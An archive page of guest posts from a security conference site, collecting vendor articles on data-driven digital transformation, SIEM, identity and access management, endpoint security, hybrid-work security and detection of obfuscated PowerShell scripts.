Guest Post, Author at Security IT Summit | Forum Events Ltd - Page 3 of 7
  • Covid-19 – click here for the latest updates from Forum Events & Media Group Ltd

Security IT Summit Security IT Summit Security IT Summit Security IT Summit Security IT Summit

Posts By :

Guest Post

Escaping from Data Lockdown with a Digital Evolution

960 640 Guest Post

With data amassing at an exponential rate, digital transformation continues to be throttled as businesses struggle to achieve the insight they need from the data. To achieve value from data, businesses need to be able to access what they need, when they need, by the right people, in a usable format. Peter Ruffley, CEO, Zizo, has previously detailed the first three aspects businesses should consider to get out of data lockdown, including data access, responsibility and outcomes. With the data readily available and the company goals in mind, businesses need to ensure that the data they’re analysing will be of value and help them meet these objectives.

Here, Peter highlights two further aspects for businesses to consider before they can move forward in their digital transformation journey. While there is no one-size-fits-all approach to suit every company, by having available and structured data with an open and flexible culture, organisations are in a much stronger position to take on this critical shift and escape from data lockdown. 

Data structure and analysis:

Data must be structured for purpose – clean and consistent data will lead to better decisions and an easier transformation. There are many whose skill set is structuring data and building data structures; but because of their fixed belief on how they think things should be done, it can be a choke point for digital transformation. You have to be prepared to follow a business objective, even if it may apparently contradict some of the deeply held beliefs of your IT colleagues, or if the data tells you something that goes against your intuition, rather than derailing the process. 

Digital transformation isn’t a one-change process, but instead, a number of transformations will need to be made and augmented with other sources of structured data – it should be conducted as an ongoing rolling programme of incremental changes and additions. That adaptability to absorb other sources of data and find other business value is what this is all about.

It’s not digital transformation, it’s digital evolution. Some things may not go 100% to plan, therefore, you have to change and adapt based around those models. And just because every decision can be driven by data, does not mean you have to analyse all the data before you take each step. There is a case for paralysis through analysis; if you try to look at everything, you will end up doing nothing. An agile way of doing things and trying something small to see if it works, using the tools and techniques for when we want to scale up or down will enable smaller steps towards transformation to be taken faster. 

Business value and collaboration:

The key to digital transformation success is collaboration and flexibility. Businesses need to be flexible enough to digitally transform the marketplace. The tools, techniques and technologies exist, but there are only some organisations that are going to be smart, quick enough and united to actually take advantage. 

By distinguishing ownership and having a sense of collaboration within your company culture, the barriers to digital transformation will be diminished as team members acknowledge the changes that are going to be made to the business as a result of this transition. Without everybody on board, the transformation will not work. Technology is just one part of the process underpinning these changes – having an open attitude towards the use of data within the organisation is a necessity. 

People need to trust the data they’re using through provenance and understanding the business rules and objectives. Rather than trying to impose a rigid framework, using data as the foundation provides you with trusted evidence and reasoning, backed up by other areas of the business. If you’ve got a dialogue supported with data that you trust, stakeholders will buy into the initiative. 

Organisations can’t expect the deployment of tools and technologies to change their business overnight, but by having a more open and collaborative attitude towards the use of data within the organisation, underpinned by new tools and technology, a digital evolution can progress in the right direction. 

LogRhythm NextGen SIEM Platform – Build your security program on a solid foundation

960 640 Guest Post

By LogRhythm

Align your team, technology, and processes to see broadly across your IT and operating environments, uncover threats, and minimise risk — all within a single, unified platform. The LogRhythm NextGen SIEM Platform is at the centre of thousands of SOCs worldwide.

Detect threats earlier and faster. 
When it comes to stopping threats, seconds matter. That’s why we built our platform for speed. You’ll quickly identify threats, automate and collaborate on investigations, and remediate threats with agility.

Gain visibility across your environment.
Eliminate blind spots across your entire enterprise — from your endpoints to the network to the cloud. Easily search across your log and other machine data to find the answers you need and know what’s happening across your environment.

Work smarter, not harder.
Spend your time on impactful work instead of maintaining, caring for, and feeding your SIEM tool. Automate repetitive tasks and labour-intensive work so your team can focus on the areas where their expertise can make a difference.

Build for today, scale for tomorrow.
The complexity and scale of your environment is growing rapidly. Don’t settle for an entry-level solution that you’ll soon outgrow. Get high performance and reduced operating costs — for today and tomorrow.

Deploy in the cloud or on-prem.

Learn more at www.logrhythm.com.

The state of the security team: Are executives the problem?

960 640 Guest Post

By LogRhythm

A global survey of security professionals and executives by LogRhythm

Amid a slew of statistics on how job stress is impacting security professionals, we sought to learn the causes of the tension and anxiety — as well understand potential ways teams might alleviate and remediate the potential of job burnout. 

We ran a global survey with security professionals and executives and investigated the tools those security professionals use to understand solution capabilities, deployment strategies, technology gaps, and the value of tool consolidation.

Key findings

“Now, more than ever, security teams are being expected to do more with less leading to increasing stress levels. With more organisations operating under remote work conditions, the attack surface has broadened, making security at scale a critical concern,” says James Carder, CSO and VP of LogRhythm Labs. “This is a call to action for executives to prioritise alleviating the stress and better support their teams with proper tools, processes, and strategic guidance.”

When asked what causes the most work-related stress, not having enough time is cited by 41 percent and working with executives by 18 percent. In fact, 57 percent of respondents think their security program lacks proper executive support — defined as providing strategic vision, buy-in and budget.

In addition, security professionals cite inadequate executive accountability for strategic security decisions as the top reason (42 percent) they want to leave their job. This is a worrying statistic, given that nearly half of companies (47 percent) are trying to fill three or more security positions.

If you are leading a security team or part of a SOC, hearing that stress is increasing in your space is likely no surprise. To keep up with the threats facing your organisation, it is clear there needs to be a cultural shift — and it must start at the top. It is no longer just the responsibility of a CISO or CSO. To ensure a company is secure, the board and executive team must supply their security team with the strategic guidance, a healthy budget, and the proper tools required to effectively do their jobs.

Further information is available in the full report, available from the LogRhythm website

Joiner-Mover-Leaver process: Solve it once and for all?

960 640 Guest Post

By Tenfold Security

JML processes give IT and HR departments regular headaches and often create quite hefty conflicts between those two departments. What is this all about?

When a new employee joins your organization, HR will know about them first, as they sign the contracts and do the onboarding. Today, many employees will require IT system access in order to fill their job role. That means IT needs to know about new hires so they can onboard them as well with all the necessary resources:

  • Client hardware (PC, Laptop, etc.)
  • Active Directory accounts, group memberships
  • E-Mail access, distribution groups, access to shared mailboxes
  • Access to applications like ERP or CRM

If HR fails to pass on that information (for whatever reason), you might end up with a new employee not being productive on their first few days, because they can’t access important systems and data. This is not only a loss for the company, but also creates great frustration for the new hire.

The same challenge arises if HR forgets to inform IT about employee that has departed from the organization recently. The result are orphaned user accounts that pose a huge security risk and generate costs in the form of unused software licenses.

How to solve the issue? We at tenfold, the leading mid-market Identity & Access Management solution propose the following:

  • If you manage less than 500 users, let HR manually input new hires, leavers and data changes (for example last name changes or new telephone numbers) into tenfold. Our software will then distribute those changes to Active Directory and other systems. Your HR users don’t have to be domain administrators for this to work.
  • If you manage more than 500 users, attach your HR management or payroll system directly to tenfold to automate the whole process. Read all about how this is made possible by the tenfold Import Plugin: https://www.tenfold-security.com/en/import-plugin-tenfold/

If you would like to learn about the basics of access management in Microsoft environments (structure, access right levels, access control lists, inheritance) then download our detailed white paper “Best Practices For Access Management In Microsoft® Environments” at this link: https://www.tenfold-security.com/en/whitepaper-best-practices/  

Want to try tenfold for yourself? No problem, just register to download our free trial https://www.tenfold-security.com/en/free-trial/

Why endpoint security matters more than ever

960 640 Guest Post

The swiftly evolving threat landscape, combined with the huge increase in remote working, means that securing your organisation’s endpoints has never been more critical.

Here, George Glass, Head of Threat Intelligence at Redscan, explains the importance of endpoint security and why detecting and responding to the latest threats demands greater endpoint visibility and specialist expertise...

Next-generation endpoint protection is a must

As cyber threats continue to evolve, it’s increasingly clear that organisations must look beyond traditional endpoint security solutions.

Antivirus software remains essential, but relying on traditional AV tools, which are largely signature-based, can leave organisations vulnerable to more sophisticated threats. Most traditional AV solutions are estimated to block just 40% of attacks.

Detecting the latest advanced threats requires next-generation capabilities, such as those provided by Endpoint Detection and Response (EDR) and Next-Gen AV (NGAV) platforms. 

EDR and NGAV technologies provide deep visibility across devices by collecting raw telemetry relating to processes, file modifications and registry changes, and using behavioural analytics to examine events in near real-time. 

Fileless malware is a serious risk to organisations and the top critical threat to endpoints in 2020. However, without more advanced endpoint detection there is a real danger that these and other sophisticated attack vectors can be missed.

The increasing risks of remote working

Providing employees with seamless access to the corporate network is essential to ensure that they can fulfil their roles effectively, but every device that connects to the network carries an inherent risk.

When employees work from home, they are located outside the protection of the corporate firewall, which can monitor and block incoming and outgoing communications to endpoint devices. Many organisations insist that employees connect to a Virtual Private Network (VPN) and while this can offer some security, ensuring all employees do so with regularity can be a challenge.

Employee devices are at greater risk for a number of other reasons too. Many often have unpatched software vulnerabilities and are operated by people susceptible to phishing, the most common attack vector used to target endpoints.

Malware threats such as Emotet are primarily delivered via emails. Emotet is equipped with wormable features, making it highly effective at triggering ransomware. 

The average cost per breach resulting from an attack on endpoints is over £7 million, more than twice the average cost of a general data breach 

(Ponemon Institute)

The significant damage and disruption that endpoint breaches can cause makes incident response critical. Securing endpoints is important because it helps organisations to reduce incident response times by disrupting and containing attacks earlier in the kill chain. Advanced tools like EDR can automate response actions, such as by terminating processes and isolating infected endpoints from a network, thereby ensuring infections are shut down as quickly as possible.

With threats deployed more quickly than ever, a swift response is vital to address critical vulnerabilities such as Zerologon and shutting down ransomware attacks, which can achieve full domain-wide encryption in just a matter of hours.

The challenges of endpoint security 

Early detection of endpoint attacks is imperative, but without a team of security experts to manage and monitor EDR and NGAV technologies around-the-clock, organisations will experience challenges with achieving the required security outcomes.

Next-generation endpoint solutions collect and analyse a huge volume of data, and the greater the number of devices and applications that are monitored, the more security alerts that can result. This causes growing complexity that can be difficult to manage for in-house teams, who may lack the specialist security training required to make sense of them.

Getting the best from the latest tools and reducing false positives requires security teams to draw upon a wide range of threat intelligence and develop custom rulesets that accurately identify the latest threat behaviours.

It is only by maximising the benefits of specialist technology that organisations will fully realise their endpoint security goals.

George Glass is Head of Threat Intelligence at Redscan, a leading UK-provider of Managed Detection and Response and security assessment services. 

To learn more, visit www.redscan.com/

Identity Access Management vs. Access Rights Management – What’s the Difference?

615 410 Guest Post

The terms access management (short: AM; also referred to as access rights management or just rights management) and identity & access management (short: IAM) are often used synonymously. In practice, however, they do not stand for the same thing. In this article, we are going to take a closer look at the difference between access rights management software and identity/access management solutions.

Check out the article at https://www.tenfold-security.com/en/identity-access-management-vs-permission-management-whats-the-difference/

If you are looking to secure data access in your organization by:

  • Getting more visibility out of your Active Directory environment
  • Want to manage file server access rights in a best practice compliant way
  • Want to automate your user lifecycle tasks
  • Let users request access and have your business owners approve requests
  • Achieve compliance for need-to-know permissions

Then try tenfold for free today and see how we will be able to make your IT infrastructure more secure from day one.

Request free trial at: https://www.tenfold-security.com/en/free-trial/

Meeting the Tests to get out of Data Lockdown

960 640 Guest Post

Digital transformation of any business has always been hampered by making sense of underlying data. And that data has been growing in volume at an unprecedented rate driven by the growth of IoT. It’s the perfect storm – the need for real-time information being increasingly distanced by the rate at which the data volume is growing. Businesses need insight, not just data, which means getting the right information, to the right person, at the right time. 

But the age-old problem remains today – how do you understand and see what data you have readily available, in a format that’s usable and that you can access at the right time? Peter Ruffley, CEO, Zizo, explores three aspects businesses must consider to get out of ‘data lockdown‘…

Data access 

There are a multitude of ways to store and access data, but a majority of businesses haven’t considered access to external data sources yet. When we begin to question how to enrich and improve data, one of the fundamental capabilities of this process is by integrating external third-party data sources, such as weather, crime or other open data sources. 

Businesses need to have an understanding of what they need to do to make the process worthwhile, and ensure they have the correct capabilities before they start. A common first approach for many organisations is to build from scratch and make it their own, rather than considering the buyer approaches where you look at what’s out there, explore the marketplace and transform existing data to use within the business, rather than starting from the ground up. 

If they can’t combine different sources of data quickly and cost-effectively together, they won’t move forward. It makes sense to digitally transform an organisation if it is going to make use of what’s already out there, as being able to tap in and share other work and insights will make the exercise worthwhile and cost-effective. With combinations of solutions available in the marketplace that can accelerate the process by providing the necessary building blocks, it’s time to transform the digital transformation process. 

Data responsibility 

There remains a disconnect between IT teams and businesses’ impressions about what it means to provide the data. If both parties are not aligned with the same aims of the business, the project could stall at the first hurdle. Instead, organisations need to bridge the divide and encourage stronger collaboration between all stakeholders. When businesses realise where those holes are in their structure, it’s key to get people involved to solve those challenges. 

This involves change on three levels; personnel, cultural and technological. Who’s responsible for this chain? Whose action is it? How do we bring these teams together? The business might be storing a lot of data, but how can it be accessed, interrogated and made useful? How will the business’ data goals be defined? 

Typically, the digital transformation initiative comes from the top in the organisation. In order to get your business on board, you have to make a very clear case of what the benefits are. Employees need to trust that improvements will be made for them by doing this, rather than just dictating the plan. Digital transformation is a change programme, which impacts all aspects of the business. You therefore have to approach it in the same way that you would approach any change project – with clear objectives and an agreed process of identifying how you’re going to get value from data. With a compelling case, you have a much better chance of carrying it through with buy in from all stakeholders. 

Data and objective identification:

You can’t embark on a digital transformation initiative without a concept – you’re condemning the project to failure if the business is not engaged properly with the process before you start. In order to yield business benefit from data, organisations must identify the areas that will realise the most benefits. Even if they’re hypothetical, there must be measurable ambitions in place or milestones for this journey, so that there is an understanding of what you’re going to do, and what you want to get out of it. Or if those ambitions weren’t achieved, why not? What steps need to be taken next time? 

Organisations have to be able to collect the data and assess whether they can achieve their business objectives from that data. But a goal of just ‘digital transformation’, ‘digitising data’ or ‘making more money’ will never translate into a concrete business case. Goals need to be specific and measurable in order to determine the project roadmap and for success to be evaluated. 

More importantly, you have to understand where the data is in your organisation and what it’s being used for, before you start the process of transformation. The whole supply chain needs to be aware of the transformation and the demands that are going to be in place. You’ve got to be very open about this process, because there will be people who you haven’t thought of that might be impacted by the changes you’re making.

With easy access, a connected team and clear objectives, companies can have a clear outline of what it is they set out to achieve in their digital transformation, how they expect to make this transition with the data available, and who can take on what role in this process. 

User Access Review – What’s That?

960 640 Guest Post

By Tenfold Security

Users come, they stay, they leave, they move around between departments and they collect privileges on the way. That’s OK, they need privileges to do their jobs. But do they need all the privileges they have, always? That’s a question you need to ask yourself, for every userrepeatedly.

This article covers what is meant by a user access review, why is it important for your business and how can you simplify the process and up your company‘s IT security and level of data protection at the same time.

Click here to read the full article.

Securing a hybrid and agile workforce

960 640 Guest Post

2020 has forced businesses to revise many of their operations. One significant transition being the shift to a remote working model, for which many were unprepared in terms of equipment, infrastructure and security. As the Government now urges people to return to work, we’re already seeing a shift towards a hybrid workforce, with many employees splitting their time between the office and working from home.

As organisations are now reassessing their long-term office strategies, front and centre to that shift needs to be their IT security underpinned by a dependable and flexible cloud infrastructure. Andrea Babbs, UK General Manager, VIPRE, discusses what this new way of working means long-term for an organisation’s IT security infrastructure and how businesses can successfully move from remote working to a secure and agile workforce.

Power of the Cloud

In light of the uncertainty that has plagued most organisations, many are looking to options that can future-proof their business and enable as much continuity as possible in the event of another unforeseen event. The migration of physical servers to the Cloud is therefore a priority, not only to facilitate agile working, but to provide businesses with greater flexibility, scalability and more efficient resources. 

COVID-19 accelerated the shift towards Cloud-based services, with more data than ever before now being stored in the Cloud. For those organisations working on Cloud-based applications and drives, the challenges of the daily commute, relocations for jobs and not being able to ‘access the drive’ are in the past for many. Cloud services are moving with the user – every employee can benefit from the same level of security no matter where they are working or which device they are using. However, it’s important to ensure businesses are taking advantage of all the features included in their Cloud subscriptions, and that they’re configured securely for hybrid working. 

Layered security defence 

Cloud-powered email, web and network security will always underline IT security defences, but these are only the first line of defence. Additional layers of security are also required to help the user understand the threat landscape, both external and internal. Particularly when working remotely with limited access to IT support teams, employees must be ready to question, verify the authenticity and interrogate the risk level of potential phishing emails or malicious links. 

With increased pressure placed on users to perform their roles faster and achieve greater results than ever before, employees will do what it takes to power through and access the information they need in the easiest and quickest way possible. This is where the cloud has an essential role to play in making this happen, not just for convenience and agility but also to allow users to stay secure – enabling secure access to applications for all devices from any location and the detection and deletion of viruses – before they reach the network. 

Email remains the most-used communication tool, even more so when remote working, but it also remains the weakest link in IT security, with 91% of cybercrimes beginning with an email. By implementing innovative tools that prompt employees to double-check emails before they send them, it can help reduce the risk of sharing the wrong information with the wrong individual. 

Additional layers of defence such as email checking tools, are removing the barriers which slow the transition to agile working and are helping to secure our new hybrid workforce, regardless of the location they’re working in, or what their job entails. 

Educating the user

The risk an individual poses to an organisation can often be the main source of vulnerability in a company’s IT infrastructure. When remote working became essential overnight, businesses faced the challenges of malware spreading from personal devices, employees being distracted and exposing incorrect information and an increase in COVID-related cyber-attacks. 

For organisations wanting to evolve into a hybrid work environment, their IT security policies need to reflect the new reality. By re-educating employees about existing products and how to leverage any additional functionality to support their decision making, users can be updated on these cyber risks and understand their responsibilities.

Security awareness training programmes teach users to be alert and more security conscious as part of the overall IT security strategy. In order to fully mitigate IT security risks and for the business to benefit from an educated workforce, both in the short and long term, employees need to change their outdated mindset. 

Changing approach

The evolution of IT and security over the past 20 years means that working from home is now easily achievable with cloud-based setups, whereas in the not too distant past, it would have been impossible. But the key to a successful and safe agile workforce is to shift the approach of a full reliance on IT, to a mindset where everyone is alert, responsible, empowered and educated with regular training, backed up by tools that reinforce a ‘security first’ approach. 

IT departments cannot be expected to stay one step ahead of cybercriminals and adapt to new threats on their own. They need their colleagues to work mindfully and responsibly on the front lines of cyber defence, comfortable in the knowledge that everything they do is underpinned by a robust and secure IT security infrastructure, but that the final decision to click the link, send the sensitive information or download the file, lies with them. 

Conclusion

As employees prove they can work from home productively, the role of the physical office is no longer necessary. For many companies, it is a sink or swim approach when implementing a hybrid and agile workforce. Introducing and retaining flexibility in operations now will help organisations cope better with any future unprecedented events or crises.

By focusing on getting the basics right and powered by the capabilities of the Cloud, highlighting the importance of layered security and challenging existing mindsets, businesses will be able to shift away from remote workers being the ‘exception,’ to a secure and agile workforce as a whole.

UK Hacking Fines

How to block hidden malicious commands in obfuscated scripts

960 640 Guest Post

By Chris Corde, VP of Product Management, VMWare Carbon Black

For a long time now, our Threat Analysts have flagged the growing threat of script-based attacks, especially from Microsoft PowerShell and Windows Management Interface script commands, and their ability to escape notice in many antivirus solutions. Increasingly, these types of attacks have become the common standard for gaining entry into corporate systems and moving laterally to inflict damage. Today, we announce several new features to help prevent and detect script abuse, including an extension of our ability to prevent script-based attacks build on AMSI integrations, and the ability to translate the actual contents of obfuscated PowerShell scripts in the Carbon Black Cloud console.      

In our current work from home/COVID-19 environment, these script based attacks continue to grow in size and global spread. Common tools like PowerShell enable attackers to hide their intent behind obfuscated script content, and the resulting lateral movement is facilitated by the abuse of Windows Management Interface (WMI), Google Drive and process hollowing. According to our latest Incident Response Report, lateral movement made up a third (33%) of today’s attacks.  

Detecting Stealthy Script Abuse 

To combat this stealthy attack technique, the Carbon Black Cloud has added capabilities that expose the exact commands behind obfuscated PowerShell scripts. By adding this capability directly into our NGAV product console, we’re able to assist less experienced security teams in detecting attacks they may have otherwise missed, as well as accelerate a formerly time-consuming investigation process. This feature also includes new insights on PowerShell scripts for those using older, legacy systems that don’t support AMSI.  

Due to broad usage of PowerShell in enterprise IT environments, many of these obfuscated scripts go unnoticed by EPP solutions because they trigger either no alert, or deceivingly low-level alerts. This makes it easy for threat actors to hide nefarious commands. Normally, you would have to copy that script and paste into an external script translation app that would offer limited details around the command line, and could take anywhere from several hours to days to resolve. The ability to translate these obfuscated scripts with a button-click during alert triage or threat hunting will save analysts hours of investigation time, by allowing them to quickly see the code and determine whether the intent is malicious or not immediately.  

Preventing Script Abuse Without Decreasing Productivity 

Thanks to our Threat Analysis Unit, VMware Carbon Black built prevention rules onto our AMSI inspection capabilities, along with machine learning to translate these previously hidden scripts. Customers can now quickly at the click of a mouse, translate the script in the Carbon Black Cloud dashboard to see the entire decoded script within seconds, along with an assigned risk score.  This new functionality brings a level of protection and visibility for these advanced attacks rarely seen in endpoint protection platforms, providing customers’ immediate access in-console to the script translation details during both alert triage and threat hunting.  

PowerShell alerts are highlighted in the console, showing the reason why a specific script was flagged, and delivering additional context behind the prevention to speed resolution times. When customers investigate the specific details, they can now simply click a button to translate the obfuscated script.  

In addition to translating obfuscated scripts, we’ve also improved readability of PowerShell scripts through syntax highlighting, making it easier for customers to scan for string content vs PowerShell command-lets and function calls while searching for threats.  

Working closely with our Threat Analysis Unit, we’ve also expanded prevention capabilities for script-based Windows attacks built on Microsoft AMSI Integrations into our default prevention policy, making it easy for customers using our product to have an effective security posture right out of the box,  

VMware Carbon Black’s Threat Analysis Unit updated the default policy to include additional granularity for frequently used off-the-shelf attacker frameworks seen regularly in script-based attacks. These updated rules offer high-fidelity prevention for script-based attacks that decrease false positives and take the strain off already resource-deficient security teams. These updated preventions are available upon download of our latest Windows sensor 3.6 coming out this week.